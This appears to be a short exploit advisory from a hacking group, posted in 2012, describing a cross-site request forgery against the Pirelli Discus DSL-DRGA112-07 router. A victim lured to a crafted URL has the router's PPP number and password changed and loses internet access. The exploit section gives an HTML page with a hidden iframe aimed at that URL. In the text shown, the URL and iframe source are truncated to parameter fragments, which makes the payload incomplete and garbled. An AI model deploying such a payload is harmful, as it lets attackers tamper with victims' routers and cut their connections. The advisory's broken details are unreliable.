# Exploit Title: Pirelli Discus DSL-DRGA112-07 Remote Change Password # Date: 17/02/2012 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Hardware: Pirelli Discus DSL-DRGA112-07 DSL-DRGA112-07 # Tested on: Linux [Comment] Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt, Maximiliano Soler Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0, InyeXion, ksha, zerial,LinuxFer, Scorp her0, r0dr1 y demas user de RemoteExecution www.remoteexecution.info www.remoteexcution.comar #RemoteExecution Hacking Group [PoC] failure may be exploited if the attacker makes his victim enter the following URL: = [number] & PasswordPPP = [password] automatically be reset his connection with new data and therefore will not have internet connection and your data will be modified. [Exploit] <html> <head> </head> <body> <iframe src="[number]&PasswordPPP=[password]"> </body> </html>